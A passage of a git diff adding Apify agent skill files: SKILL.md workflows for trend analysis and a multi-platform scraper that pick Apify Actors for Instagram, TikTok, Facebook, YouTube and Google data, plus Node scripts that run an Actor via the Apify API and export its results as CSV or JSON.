+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/apify-trend-analysis/SKILL.md b/web-app/public/skills/apify-trend-analysis/SKILL.md
new file mode 100644
index 00000000..7692cde3
--- /dev/null
+++ b/web-app/public/skills/apify-trend-analysis/SKILL.md
@@ -0,0 +1,122 @@
+---
+name: apify-trend-analysis
+description: Discover and track emerging trends across Google Trends, Instagram, Facebook, YouTube, and TikTok to inform content strategy.
+---
+
+# Trend Analysis
+
+Discover and track emerging trends using Apify Actors to extract data from multiple platforms.
+
+## Prerequisites
+(No need to check it upfront)
+
+- `.env` file with `APIFY_TOKEN`
+- Node.js 20.6+ (for native `--env-file` support)
+- `mcpc` CLI tool: `npm install -g @apify/mcpc`
+
+## Workflow
+
+Copy this checklist and track progress:
+
+```
+Task Progress:
+- [ ] Step 1: Identify trend type (select Actor)
+- [ ] Step 2: Fetch Actor schema via mcpc
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the analysis script
+- [ ] Step 5: Summarize findings
+```
+
+### Step 1: Identify Trend Type
+
+Select the appropriate Actor based on research needs:
+
+| User Need | Actor ID | Best For |
+|-----------|----------|----------|
+| Search trends | `apify/google-trends-scraper` | Google Trends data |
+| Hashtag tracking | `apify/instagram-hashtag-scraper` | Hashtag content |
+| Hashtag metrics | `apify/instagram-hashtag-stats` | Performance stats |
+| Visual trends | `apify/instagram-post-scraper` | Post analysis |
+| Trending discovery | `apify/instagram-search-scraper` | Search trends |
+| Comprehensive tracking | `apify/instagram-scraper` | Full data |
+| API-based trends | `apify/instagram-api-scraper` | API access |
+| Engagement trends | `apify/export-instagram-comments-posts` | Comment tracking |
+| Product trends | `apify/facebook-marketplace-scraper` | Marketplace data |
+| Visual analysis | `apify/facebook-photos-scraper` | Photo trends |
+| Community trends | `apify/facebook-groups-scraper` | Group monitoring |
+| YouTube Shorts | `streamers/youtube-shorts-scraper` | Short-form trends |
+| YouTube hashtags | `streamers/youtube-video-scraper-by-hashtag` | Hashtag videos |
+| TikTok hashtags | `clockworks/tiktok-hashtag-scraper` | Hashtag content |
+| Trending sounds | `clockworks/tiktok-sound-scraper` | Audio trends |
+| TikTok ads | `clockworks/tiktok-ads-scraper` | Ad trends |
+| Discover page | `clockworks/tiktok-discover-scraper` | Discover trends |
+| Explore trends | `clockworks/tiktok-explore-scraper` | Explore content |
+| Trending content | `clockworks/tiktok-trends-scraper` | Viral content |
+
+### Step 2: Fetch Actor Schema
+
+Fetch the Actor's input schema and details dynamically using mcpc:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call fetch-actor-details actor:="ACTOR_ID" | jq -r ".content"
+```
+
+Replace `ACTOR_ID` with the selected Actor (e.g., `apify/google-trends-scraper`).
+
+This returns:
+- Actor description and README
+- Required and optional input parameters
+- Output fields (if available)
+
+### Step 3: Ask User Preferences
+
+Before running, ask:
+1. **Output format**:
+ - **Quick answer** - Display top few results in chat (no file saved)
+ - **CSV** - Full export with all fields
+ - **JSON** - Full export in JSON format
+2. **Number of results**: Based on character of use case
+
+### Step 4: Run the Script
+
+**Quick answer (display in chat, no file):**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT'
+```
+
+**CSV:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.csv \
+ --format csv
+```
+
+**JSON:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.json \
+ --format json
+```
+
+### Step 5: Summarize Findings
+
+After completion, report:
+- Number of results found
+- File location and name
+- Key trend insights
+- Suggested next steps (deeper analysis, content opportunities)
+
+
+## Error Handling
+
+`APIFY_TOKEN not found` - Ask user to create `.env` with `APIFY_TOKEN=your_token`
+`mcpc not found` - Ask user to install `npm install -g @apify/mcpc`
+`Actor not found` - Check Actor ID spelling
+`Run FAILED` - Ask user to check Apify console link in error output
+`Timeout` - Reduce input size or increase `--timeout`
diff --git a/web-app/public/skills/apify-trend-analysis/reference/scripts/run_actor.js b/web-app/public/skills/apify-trend-analysis/reference/scripts/run_actor.js
new file mode 100644
index 00000000..55124270
--- /dev/null
+++ b/web-app/public/skills/apify-trend-analysis/reference/scripts/run_actor.js
@@ -0,0 +1,363 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output leads.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-trend-analysis-1.0.0';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., compass/crawler-google-places) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 in chat
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}'
+
+ # Export all data to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}' \\
+ --output leads.csv --format csv
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/apify-ultimate-scraper/SKILL.md b/web-app/public/skills/apify-ultimate-scraper/SKILL.md
new file mode 100644
index 00000000..b41a22ca
--- /dev/null
+++ b/web-app/public/skills/apify-ultimate-scraper/SKILL.md
@@ -0,0 +1,230 @@
+---
+name: apify-ultimate-scraper
+description: "Universal AI-powered web scraper for any platform. Scrape data from Instagram, Facebook, TikTok, YouTube, Google Maps, Google Search, Google Trends, Booking.com, and TripAdvisor. Use for lead gener..."
+---
+
+# Universal Web Scraper
+
+AI-driven data extraction from 55+ Actors across all major platforms. This skill automatically selects the best Actor for your task.
+
+## Prerequisites
+(No need to check it upfront)
+
+- `.env` file with `APIFY_TOKEN`
+- Node.js 20.6+ (for native `--env-file` support)
+- `mcpc` CLI tool: `npm install -g @apify/mcpc`
+
+## Workflow
+
+Copy this checklist and track progress:
+
+```
+Task Progress:
+- [ ] Step 1: Understand user goal and select Actor
+- [ ] Step 2: Fetch Actor schema via mcpc
+- [ ] Step 3: Ask user preferences (format, filename)
+- [ ] Step 4: Run the scraper script
+- [ ] Step 5: Summarize results and offer follow-ups
+```
+
+### Step 1: Understand User Goal and Select Actor
+
+First, understand what the user wants to achieve. Then select the best Actor from the options below.
+
+#### Instagram Actors (12)
+
+| Actor ID | Best For |
+|----------|----------|
+| `apify/instagram-profile-scraper` | Profile data, follower counts, bio info |
+| `apify/instagram-post-scraper` | Individual post details, engagement metrics |
+| `apify/instagram-comment-scraper` | Comment extraction, sentiment analysis |
+| `apify/instagram-hashtag-scraper` | Hashtag content, trending topics |
+| `apify/instagram-hashtag-stats` | Hashtag performance metrics |
+| `apify/instagram-reel-scraper` | Reels content and metrics |
+| `apify/instagram-search-scraper` | Search users, places, hashtags |
+| `apify/instagram-tagged-scraper` | Posts tagged with specific accounts |
+| `apify/instagram-followers-count-scraper` | Follower count tracking |
+| `apify/instagram-scraper` | Comprehensive Instagram data |
+| `apify/instagram-api-scraper` | API-based Instagram access |
+| `apify/export-instagram-comments-posts` | Bulk comment/post export |
+
+#### Facebook Actors (14)
+
+| Actor ID | Best For |
+|----------|----------|
+| `apify/facebook-pages-scraper` | Page data, metrics, contact info |
+| `apify/facebook-page-contact-information` | Emails, phones, addresses from pages |
+| `apify/facebook-posts-scraper` | Post content and engagement |
+| `apify/facebook-comments-scraper` | Comment extraction |
+| `apify/facebook-likes-scraper` | Reaction analysis |
+| `apify/facebook-reviews-scraper` | Page reviews |
+| `apify/facebook-groups-scraper` | Group content and members |
+| `apify/facebook-events-scraper` | Event data |
+| `apify/facebook-ads-scraper` | Ad creative and targeting |
+| `apify/facebook-search-scraper` | Search results |
+| `apify/facebook-reels-scraper` | Reels content |
+| `apify/facebook-photos-scraper` | Photo extraction |
+| `apify/facebook-marketplace-scraper` | Marketplace listings |
+| `apify/facebook-followers-following-scraper` | Follower/following lists |
+
+#### TikTok Actors (14)
+
+| Actor ID | Best For |
+|----------|----------|
+| `clockworks/tiktok-scraper` | Comprehensive TikTok data |
+| `clockworks/free-tiktok-scraper` | Free TikTok extraction |
+| `clockworks/tiktok-profile-scraper` | Profile data |
+| `clockworks/tiktok-video-scraper` | Video details and metrics |
+| `clockworks/tiktok-comments-scraper` | Comment extraction |
+| `clockworks/tiktok-followers-scraper` | Follower lists |
+| `clockworks/tiktok-user-search-scraper` | Find users by keywords |
+| `clockworks/tiktok-hashtag-scraper` | Hashtag content |
+| `clockworks/tiktok-sound-scraper` | Trending sounds |
+| `clockworks/tiktok-ads-scraper` | Ad content |
+| `clockworks/tiktok-discover-scraper` | Discover page content |
+| `clockworks/tiktok-explore-scraper` | Explore content |
+| `clockworks/tiktok-trends-scraper` | Trending content |
+| `clockworks/tiktok-live-scraper` | Live stream data |
+
+#### YouTube Actors (5)
+
+| Actor ID | Best For |
+|----------|----------|
+| `streamers/youtube-scraper` | Video data and metrics |
+| `streamers/youtube-channel-scraper` | Channel information |
+| `streamers/youtube-comments-scraper` | Comment extraction |
+| `streamers/youtube-shorts-scraper` | Shorts content |
+| `streamers/youtube-video-scraper-by-hashtag` | Videos by hashtag |
+
+#### Google Maps Actors (4)
+
+| Actor ID | Best For |
+|----------|----------|
+| `compass/crawler-google-places` | Business listings, ratings, contact info |
+| `compass/google-maps-extractor` | Detailed business data |
+| `compass/Google-Maps-Reviews-Scraper` | Review extraction |
+| `poidata/google-maps-email-extractor` | Email discovery from listings |
+
+#### Other Actors (6)
+
+| Actor ID | Best For |
+|----------|----------|
+| `apify/google-search-scraper` | Google search results |
+| `apify/google-trends-scraper` | Google Trends data |
+| `voyager/booking-scraper` | Booking.com hotel data |
+| `voyager/booking-reviews-scraper` | Booking.com reviews |
+| `maxcopell/tripadvisor-reviews` | TripAdvisor reviews |
+| `vdrmota/contact-info-scraper` | Contact enrichment from URLs |
+
+---
+
+#### Actor Selection by Use Case
+
+| Use Case | Primary Actors |
+|----------|---------------|
+| **Lead Generation** | `compass/crawler-google-places`, `poidata/google-maps-email-extractor`, `vdrmota/contact-info-scraper` |
+| **Influencer Discovery** | `apify/instagram-profile-scraper`, `clockworks/tiktok-profile-scraper`, `streamers/youtube-channel-scraper` |
+| **Brand Monitoring** | `apify/instagram-tagged-scraper`, `apify/instagram-hashtag-scraper`, `compass/Google-Maps-Reviews-Scraper` |
+| **Competitor Analysis** | `apify/facebook-pages-scraper`, `apify/facebook-ads-scraper`, `apify/instagram-profile-scraper` |
+| **Content Analytics** | `apify/instagram-post-scraper`, `clockworks/tiktok-scraper`, `streamers/youtube-scraper` |
+| **Trend Research** | `apify/google-trends-scraper`, `clockworks/tiktok-trends-scraper`, `apify/instagram-hashtag-stats` |
+| **Review Analysis** | `compass/Google-Maps-Reviews-Scraper`, `voyager/booking-reviews-scraper`, `maxcopell/tripadvisor-reviews` |
+| **Audience Analysis** | `apify/instagram-followers-count-scraper`, `clockworks/tiktok-followers-scraper`, `apify/facebook-followers-following-scraper` |
+
+---
+
+#### Multi-Actor Workflows
+
+For complex tasks, chain multiple Actors:
+
+| Workflow | Step 1 | Step 2 |
+|----------|--------|--------|
+| **Lead enrichment** | `compass/crawler-google-places` → | `vdrmota/contact-info-scraper` |
+| **Influencer vetting** | `apify/instagram-profile-scraper` → | `apify/instagram-comment-scraper` |
+| **Competitor deep-dive** | `apify/facebook-pages-scraper` → | `apify/facebook-posts-scraper` |
+| **Local business analysis** | `compass/crawler-google-places` → | `compass/Google-Maps-Reviews-Scraper` |
+
+#### Can't Find a Suitable Actor?
+
+If none of the Actors above match the user's request, search the Apify Store directly:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call search-actors keywords:="SEARCH_KEYWORDS" limit:=10 offset:=0 category:="" | jq -r '.content[0].text'
+```
+
+Replace `SEARCH_KEYWORDS` with 1-3 simple terms (e.g., "LinkedIn profiles", "Amazon products", "Twitter").
+
+### Step 2: Fetch Actor Schema
+
+Fetch the Actor's input schema and details dynamically using mcpc:
+
+```bash
+export $(grep APIFY_TOKEN .env | xargs) && mcpc --json mcp.apify.com --header "Authorization: Bearer $APIFY_TOKEN" tools-call fetch-actor-details actor:="ACTOR_ID" | jq -r ".content"
+```
+
+Replace `ACTOR_ID` with the selected Actor (e.g., `compass/crawler-google-places`).
+
+This returns:
+- Actor description and README
+- Required and optional input parameters
+- Output fields (if available)
+
+### Step 3: Ask User Preferences
+
+Before running, ask:
+1. **Output format**:
+ - **Quick answer** - Display top few results in chat (no file saved)
+ - **CSV** - Full export with all fields
+ - **JSON** - Full export in JSON format
+2. **Number of results**: Based on character of use case
+
+### Step 4: Run the Script
+
+**Quick answer (display in chat, no file):**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT'
+```
+
+**CSV:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.csv \
+ --format csv
+```
+
+**JSON:**
+```bash
+node --env-file=.env ${CLAUDE_PLUGIN_ROOT}/reference/scripts/run_actor.js \
+ --actor "ACTOR_ID" \
+ --input 'JSON_INPUT' \
+ --output YYYY-MM-DD_OUTPUT_FILE.json \
+ --format json
+```
+
+### Step 5: Summarize Results and Offer Follow-ups
+
+After completion, report:
+- Number of results found
+- File location and name
+- Key fields available
+- **Suggested follow-up workflows** based on results:
+
+| If User Got | Suggest Next |
+|-------------|--------------|
+| Business listings | Enrich with `vdrmota/contact-info-scraper` or get reviews |
+| Influencer profiles | Analyze engagement with comment scrapers |
+| Competitor pages | Deep-dive with post/ad scrapers |
+| Trend data | Validate with platform-specific hashtag scrapers |
+
+
+## Error Handling
+
+`APIFY_TOKEN not found` - Ask user to create `.env` with `APIFY_TOKEN=your_token`
+`mcpc not found` - Ask user to install `npm install -g @apify/mcpc`
+`Actor not found` - Check Actor ID spelling
+`Run FAILED` - Ask user to check Apify console link in error output
+`Timeout` - Reduce input size or increase `--timeout`
diff --git a/web-app/public/skills/apify-ultimate-scraper/reference/scripts/run_actor.js b/web-app/public/skills/apify-ultimate-scraper/reference/scripts/run_actor.js
new file mode 100644
index 00000000..9a964576
--- /dev/null
+++ b/web-app/public/skills/apify-ultimate-scraper/reference/scripts/run_actor.js
@@ -0,0 +1,363 @@
+#!/usr/bin/env node
+/**
+ * Apify Actor Runner - Runs Apify actors and exports results.
+ *
+ * Usage:
+ * # Quick answer (display in chat, no file saved)
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+ *
+ * # Export to file
+ * node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}' --output leads.csv --format csv
+ */
+
+import { parseArgs } from 'node:util';
+import { writeFileSync, statSync } from 'node:fs';
+
+// User-Agent for tracking skill usage in Apify analytics
+const USER_AGENT = 'apify-agent-skills/apify-ultimate-scraper-1.3.0';
+
+// Parse command-line arguments
+function parseCliArgs() {
+ const options = {
+ actor: { type: 'string', short: 'a' },
+ input: { type: 'string', short: 'i' },
+ output: { type: 'string', short: 'o' },
+ format: { type: 'string', short: 'f', default: 'csv' },
+ timeout: { type: 'string', short: 't', default: '600' },
+ 'poll-interval': { type: 'string', default: '5' },
+ help: { type: 'boolean', short: 'h' },
+ };
+
+ const { values } = parseArgs({ options, allowPositionals: false });
+
+ if (values.help) {
+ printHelp();
+ process.exit(0);
+ }
+
+ if (!values.actor) {
+ console.error('Error: --actor is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ if (!values.input) {
+ console.error('Error: --input is required');
+ printHelp();
+ process.exit(1);
+ }
+
+ return {
+ actor: values.actor,
+ input: values.input,
+ output: values.output,
+ format: values.format || 'csv',
+ timeout: parseInt(values.timeout, 10),
+ pollInterval: parseInt(values['poll-interval'], 10),
+ };
+}
+
+function printHelp() {
+ console.log(`
+Apify Actor Runner - Run Apify actors and export results
+
+Usage:
+ node --env-file=.env scripts/run_actor.js --actor ACTOR_ID --input '{}'
+
+Options:
+ --actor, -a Actor ID (e.g., compass/crawler-google-places) [required]
+ --input, -i Actor input as JSON string [required]
+ --output, -o Output file path (optional - if not provided, displays quick answer)
+ --format, -f Output format: csv, json (default: csv)
+ --timeout, -t Max wait time in seconds (default: 600)
+ --poll-interval Seconds between status checks (default: 5)
+ --help, -h Show this help message
+
+Output Formats:
+ JSON (all data) --output file.json --format json
+ CSV (all data) --output file.csv --format csv
+ Quick answer (no --output) - displays top 5 in chat
+
+Examples:
+ # Quick answer - display top 5 in chat
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}'
+
+ # Export all data to CSV
+ node --env-file=.env scripts/run_actor.js \\
+ --actor "compass/crawler-google-places" \\
+ --input '{"searchStringsArray": ["coffee shops"], "locationQuery": "Seattle, USA"}' \\
+ --output leads.csv --format csv
+`);
+}
+
+// Start an actor run and return { runId, datasetId }
+async function startActor(token, actorId, inputJson) {
+ // Convert "author/actor" format to "author~actor" for API compatibility
+ const apiActorId = actorId.replace('/', '~');
+ const url = `https://api.apify.com/v2/acts/${apiActorId}/runs?token=${encodeURIComponent(token)}`;
+
+ let data;
+ try {
+ data = JSON.parse(inputJson);
+ } catch (e) {
+ console.error(`Error: Invalid JSON input: ${e.message}`);
+ process.exit(1);
+ }
+
+ const response = await fetch(url, {
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'User-Agent': `${USER_AGENT}/start_actor`,
+ },
+ body: JSON.stringify(data),
+ });
+
+ if (response.status === 404) {
+ console.error(`Error: Actor '${actorId}' not found`);
+ process.exit(1);
+ }
+
+ if (!response.ok) {
+ const text = await response.text();
